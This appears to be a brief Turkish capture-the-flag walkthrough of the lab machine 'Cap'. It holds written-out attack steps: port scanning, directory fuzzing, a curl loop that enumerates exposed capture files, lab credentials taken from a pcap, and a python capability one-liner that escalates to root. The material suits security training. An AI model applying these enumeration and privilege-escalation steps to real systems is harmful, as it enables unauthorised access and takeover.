IP=10.129.82.1
her zamanki gibi full port scan taraması yapıldı
┌─[carrie@parrot]─[~/Desktop/Machines/Cap]
└──╼ $nmap -sV -vv -T4 -n -Pn --max-rtt-timeout 1500ms --min-rate 1000 --max-retries 3 --open $IP -oG full_port_scan -p-
1/tcp open ftpsyn-ack vsftpd 3.0.3
22/tcp open sshsyn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open httpsyn-ack Gunicorn
carrie@parrot]─[~/Desktop/Machines/Cap]
└──╼ $nmap -sC -p21 $IP -vv -Pn -n
script scan yaptım zafiyet var mı yok mu diye
web olduğu için webi incelerken arkada ffuf çalıştırdım
┌─[carrie@parrot]─[~/Desktop/Machines/Cap]
└──╼ $ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -u http://10.129.82.1/FUZZ
/data/ ve search parametresi dikkatimi çektiği için üzerine gittim ama her zamanki gibi /data/'da verirken
┌─[✗]─[carrie@parrot]─[~/Desktop/Machines/Cap]
└──╼ $for i in {1..3000}; do
code=$(curl -s -o /dev/null -w "%{http_code}" "http://10.129.82.1/data/$i")
[ "$code" = "200" ] && echo "$i"
doneverdim :D boşa geçen onca zamandan sonra 0'I deneyince zihnim açıldı vesselam
pcap dosyası inceleyince
user : nathan
password : Buck3tH4TF0RM3!
ftp girişini buldum ve içeri giriş sağladım.
bunu ssh üzerinde de denedim yine giriş sağladı sağolsun nathan ablamıza.
linpeası çalıştırıken user olarak capabilities'te python'u çalıtşırabileceğimi gördüm ;
https://gtfobins.org/gtfobins/python/
nathan@cap:/tmp$ python3 -c 'import os; os.setuid(0); os.execl("/bin/sh", "sh")'şu kod ile root.txt alındı.